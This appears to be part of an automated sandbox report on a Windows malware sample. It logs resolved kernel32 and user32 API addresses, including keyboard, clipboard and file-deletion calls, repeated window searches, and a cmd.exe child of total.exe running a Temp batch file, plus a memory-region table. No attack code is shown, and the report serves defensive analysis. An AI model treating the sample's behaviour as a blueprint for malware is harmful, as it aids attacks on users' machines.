| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x75ca33a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatA, address_out = 0x75cca842 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeResource, address_out = 0x75cbd3db |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatA, address_out = 0x75cca959 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x75cb9b2d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ca103d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x75cbeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x75ca3e8e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x75ca588e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalLock, address_out = 0x75cbd0a7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedIncrement, address_out = 0x75ca1400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalUnlock, address_out = 0x75cbcfdf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOverlappedResult, address_out = 0x75cbcc79 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSizeEx, address_out = 0x75ca59e2 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75cbce2e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75ca89b3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileW, address_out = 0x75cb9af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75ca418b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileTime, address_out = 0x75cbecbb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x75ca1275 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepEx, address_out = 0x75ca1215 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x75ca4407 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalDrives, address_out = 0x75ca5371 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75ca4435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75ca54ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryW, address_out = 0x75d244cf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75ca4442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileAttributesW, address_out = 0x75cbd4f7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75ca5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceFrequency, address_out = 0x75ca41f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ca1725 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenEventW, address_out = 0x75ca15d6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75ca183e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75ca16c5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TryEnterCriticalSection, address_out = 0x77d62500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77d522b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSection, address_out = 0x77d62c42 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77d645f5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ca87c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x75ca196e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ca168c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x75ca542c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x75ca17ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x75ca49ca |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x75cadd0e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ca3509 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ca14fb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x75ca32bb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResumeThread, address_out = 0x75ca43ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75ca1886 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ca49ad |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreW, address_out = 0x75cbca5a |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ca11e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x75ca58a6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75cbd802 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ca7a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75ca11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75ca1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalSize, address_out = 0x75cbe741 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalCompact, address_out = 0x75d1efc6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalSize, address_out = 0x75cbd16f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ca1222 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ca5959 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77d69d35 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75ca1916 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringW, address_out = 0x75ca3bca |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ca17b9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoW, address_out = 0x75ca3c42 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ca5189 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75cc772f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ca5235 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObjectEx, address_out = 0x75ca1151 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ca4d40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ca11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateDirectoryW, address_out = 0x75ca4259 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ca7a2f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSListHead, address_out = 0x77d694a4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ccd1c3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75ca3531 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ca4a6f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d8d598 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryAndExitThread, address_out = 0x75cbd582 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77d5e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77d71f6e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ca14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ca51b3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75ca469b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75d47bff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75ca1328 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocale, address_out = 0x75cbce46 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLCID, address_out = 0x75ca3da5 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesW, address_out = 0x75d2425f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75cbc807 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75d4739a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75d2454f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ca14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileExA, address_out = 0x75d2427f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileA, address_out = 0x75ccd53e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ca4493 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x75ca51a1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ca1946 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ca51e3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ca51cb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x75cae331 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75cc7aca |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetHandleInformation, address_out = 0x75cb195c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77d63002 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77d70fcb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetClipboardData, address_out = 0x767d8e57 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetUserObjectInformationW, address_out = 0x76798068 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowLongW, address_out = 0x76798332 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = PostQuitMessage, address_out = 0x76799abb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDesktopWindow, address_out = 0x767a0a19 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorPos, address_out = 0x767a1218 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = VkKeyScanExW, address_out = 0x767acd66 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MapVirtualKeyW, address_out = 0x767c1459 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetAsyncKeyState, address_out = 0x767beb96 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadKeyboardLayoutW, address_out = 0x767dbb17 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageTimeoutW, address_out = 0x767997d2 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SystemParametersInfoW, address_out = 0x767990d3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = keybd_event, address_out = 0x767f02bf |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x76797d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetThreadDesktop, address_out = 0x767a0296 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardState, address_out = 0x767bec68 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ExitWindowsEx, address_out = 0x767e1497 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = mouse_event, address_out = 0x767f027b |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DestroyWindow, address_out = 0x76799a55 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExW, address_out = 0x76798a29 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExW, address_out = 0x7679b17d |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = PeekMessageW, address_out = 0x767a05ba |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x77d724e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageW, address_out = 0x767978e2 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = PostThreadMessageW, address_out = 0x76798bff |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = WinHelpW, address_out = 0x767e8a63 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageW, address_out = 0x7679fbd1 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x7679dad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x767991b4 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetClipboardData, address_out = 0x767d9f1d |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = FindWindowA, address_out = 0x7679ffe6 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowLongA, address_out = 0x767a6110 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DrawFocusRect, address_out = 0x767a89c2 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x767a35a4 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBeep, address_out = 0x767ac036 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxA, address_out = 0x767efd1e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowRect, address_out = 0x76797f34 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowTextA, address_out = 0x767a0029 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextA, address_out = 0x767a7aee |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetForegroundWindow, address_out = 0x767a2320 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetActiveWindow, address_out = 0x767a3208 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DeleteMenu, address_out = 0x767a6d2a |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DestroyMenu, address_out = 0x767a3e26 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMenuState, address_out = 0x767aa7c1 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMenu, address_out = 0x767a5041 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateAcceleratorA, address_out = 0x767a85e5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadAcceleratorsA, address_out = 0x767a84cb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = KillTimer, address_out = 0x767979db |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetTimer, address_out = 0x767979fb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharNextA, address_out = 0x76797a1b |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharUpperBuffW, address_out = 0x7679fc5d |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = IsClipboardFormatAvailable, address_out = 0x767a8676 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendDlgItemMessageW, address_out = 0x767bd0f5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = IsZoomed, address_out = 0x767a3332 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ca4f2b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ca359f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ca1252 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ca4208 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75ca4d28 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitOnceExecuteOnce, address_out = 0x75cbd627 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75d2410b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75d24195 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75cbee7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77d7441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77d9c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77d9c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75cbf088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77d805d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77d9ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d50b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77e0fde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77da1e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75d1cd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75cbeee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleEx, address_out = 0x75cbc78f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandle, address_out = 0x75cccbfc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimePreciseAsFileTime, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77d68456 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77dd7de4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77d9409d |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x75d24b32 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSRWLock, address_out = 0x77d68456 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x77d629f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TryAcquireSRWLockExclusive, address_out = 0x77d74892 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x77d629ab |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x75d24b74 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWork, address_out = 0x75cbee45 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SubmitThreadpoolWork, address_out = 0x77da8491 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWork, address_out = 0x77d9d8e2 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75d246b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75d24751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75d247f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x75d23f49 |
|
1 |
Window (249)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Find | hgryrthr | - |
|
249 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 199119 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #8: cmd.exe
236
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd /c C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat |
| Initial Working Directory | C:\Users\ADU0VK~1\AppData\Local\Temp\ |
| Monitor | Start Time: 00:02:40, Reason: Child Process |
| Unmonitor | End Time: 00:02:46, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcc |
| Parent PID | 0x4c8 (c:\users\adu0vk~1\appdata\local\temp\total.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
780
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a07fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x01f9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001fa0000 | 0x01fa0000 | 0x022e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x022f0000 | 0x025befff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ac10000 | 0x4ac5bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x755d0000 | 0x755d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x755e0000 | 0x7563bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75640000 | 0x7567efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x75760000 | 0x75766fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75880000 | 0x7588bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75890000 | 0x758effff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a55fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75bc0000 | 0x75c6bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75c90000 | 0x75d9ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f20000 | 0x7600ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76050000 | 0x7611bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76650000 | 0x766effff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76780000 | 0x7687ffff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x774d0000 | 0x7756cfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77600000 | 0x7768ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77790000 | 0x777effff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x777f0000 | 0x77808fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077930000 | 0x77930000 | 0x77a4efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077a50000 | 0x77a50000 | 0x77b49fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77b50000 | 0x77cf8fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77d00000 | 0x77d09fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77d30000 | 0x77eaffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
